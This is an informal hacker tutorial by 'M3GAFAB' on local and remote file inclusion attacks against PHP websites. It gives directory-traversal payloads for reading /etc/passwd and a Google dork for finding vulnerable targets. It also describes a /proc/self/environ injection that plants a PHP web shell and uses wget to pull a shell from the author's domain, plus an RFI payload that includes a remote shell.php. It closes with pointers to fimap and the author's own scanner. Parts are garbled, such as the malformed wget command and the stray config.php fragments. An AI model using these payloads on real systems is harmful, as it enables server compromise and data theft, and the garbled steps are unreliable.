LFI & RFI Tutorial .

1.  
2.  
3. #megafab.net
4. //////////////////////////////////////////////////////////////////////////////////////////////////////
5.  
6. #########################################################################################
7. # Tutorial .
8. # LFI & RFI Tutorial --
9. # Author : M3GAFAB .
10. # Greetz - to all my friendS ^_^ <3 !..............!
11. ##########################################################################################
12.  
13. --------------------------------------------------------------------------------------------------------------
14.  
15. LFI- local file inclusion
16.  
17. Its include the file of the server in our browser..
18. To see if a script is vulnerable to local file inclusion,
19.  
20. index.php?page=../../../../../../../../../etc/passwd
21.  
22. That Shows the complete User information in that server with paths..
23. Where ../ causes the script to move up one directoryWhere directory,
24. Multiple ../ cause the script to move to the top level directory (/, the root of the
25. filesystem) and /etc/passwd is the Unix passwd file.
26.  
27. google dork: inurl:.php?page=
28.  
29. example:www.targetSITE.com/contacts.php?page=abc.php
30.  
31. test:www.targetSITE.com/contacts.php?page=../fab.php
32.  
33. now in linux server server there is etc/password
34.  
35. 1... www.targetSITE.com/index
36. ../
37. =../../../etc/passwd
38. =../../../etc/passwd%00
39.  
40. etc/passwdfile
41. proc/self/environ is the writable file by end
42. or var/log/httpd-access.log is also writable
43.  
44. proc/self/environ
45. add one- user agent switcher
46.  
47. config.php
48. <?php passthru($_GET['cmd']) ?>
49. ../proc/self//environ&cmd=wget http://megafab.net/sh3ll O shell.php
50.  
51. config.php
52. ip
53. username
54. pwd
55.  
56. Done..
57. ----------------------------------------------------------------------------------------------
58.  
59. RFI - Remote file inclusion
60.  
61. Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
62. It allows an attacker to include a remote file, usually through a script on the web
63. server. The vulnerability occurs due to the use of user-supplied input without
64. proper validation. This can lead to something as minimal as outputting the contents
65. of the file, but depending on the severity, to list a few it can lead to:
66.  
67. -> Code execution on the web server
68. -> Code execution on the client-side such as JavaScript which can lead to other
69. attacks such as cross site scripting (XSS).
70. -> Denial of Service (DoS)
71. -> Data Theft/Manipulation
72.  
73. By default allow_url_include is ON -----> in php.ini
74.  
75. www.targetSITE.com/contacts.php?page=http://www.site.com/shell.php
76.  
77. -----------------------------------------------------------------------------------------------------------
78. Ok now we have a tool called FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
79. Fimap its a simple python tool which can find, prepare, audit, EXPLOIT and even GOOGLE automatically for Local "LFI" and Remote "RFI" file inclusion bugs in WEBSITE's. FIMAP should be something like SQLMAP just for LFI/RFI Bugs , and not SQL Injection ...
80.  
81. Download at ( https://code.google.com/p/fimap/downloads/list )
82.  
83. ------------------------------------------------------------------------------------------------------------------
84.  
85. Ok now im sharing with you a LFI Vulnerability SCANNER that helps you find LFI Vulnerability's .
86.  
87. Download ( http://megafab.net/lfiscan.txt )
88.  
89. You need first " PYTHON " installed then open with TERMINAL or CMD ...
90. Use it as . ./lfiscan.py –url=
91.  
92. EXAMPLE - ./lfiscan.py –url=”http://www.target.com/page.php?file=exp
93.  
94. ####################################################################################################
95. cyberz0ne.net
96. megafab.net (Official Website)
97. twitter.com/M3GAFAB ( Follow )
98. facebook.com/m3gafabb ( Like )
99.  
100. Thanks For Reading .. Sharing Its CarinG .. ^_^
101. ./LogOut
102. ####################################################################################################